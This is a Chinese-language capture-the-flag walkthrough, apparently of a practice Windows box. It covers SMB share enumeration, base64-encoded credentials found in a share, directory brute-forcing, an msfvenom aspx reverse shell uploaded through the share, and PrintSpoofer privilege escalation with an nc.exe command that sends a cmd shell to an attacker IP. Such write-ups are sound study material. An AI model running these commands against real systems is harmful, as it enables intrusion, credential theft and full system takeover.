打开是个windows,nmap扫描了一下smb
enum4linux不能运作?

smbclient -L 10.10.99.122
Pasted%20image%2020240129171502
列出共享服务,有个磁盘,继续列出
smbclient \\\\10.10.99.122\\nt4wrksv

Pasted%20image%2020240129171604

发现有个密码,拿下来看看

Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

一眼b64
Pasted%20image%2020240129171742
拿下来看看
之前扫的不够仔细,其实还有很多端口是开着的

Pasted%20image%2020240129173027

Pasted%20image%2020240129173348

这里还有一个web服务,去爆破一下目录
gobuster dir -u http://10.10.99.122:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

扫个大点的

额.反正扫出来就是上面展示的那个磁盘的目录

http://10.10.99.122:49663/nt4wrksv/passwords.txt这个就是我们刚刚访问的文件

接下来是windows内容,不怎么会,边看边学

.aspx扩展以在IIS服务器上执行他

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.69.58 LPORT=443 -f aspx > relevant.aspx

Pasted%20image%2020240129174440
这样子放上去,然后监听好443,直接访问那个文件就行了

Pasted%20image%2020240129174730

发现启动了SeImpersonatePrivilege
传一个https://github.com/dievus/printspoofer/blob/master/PrintSpoofer.exe
cd C:\inetpub\wwwroot\nt4wrksv

  • inetpub” 通常是 Internet Information Services (IIS) 的默认根目录,用于存放 Web 服务器的文件和网站内容。
  • wwwroot” 是 IIS 中默认的 Web 根目录,用于存放网站的文件和页面。
    先进去吧

PrintSpoofer32.exe -c "c:\inetpub\wwwroot\nt4wrksv\nc.exe 10.14.69.58 9999 -e cmd"

接着打,网络真的是一坨

SeImpersonatePrivilege

.\PrintSpoofer64.exe -i -c cmd
Pasted%20image%2020240129223229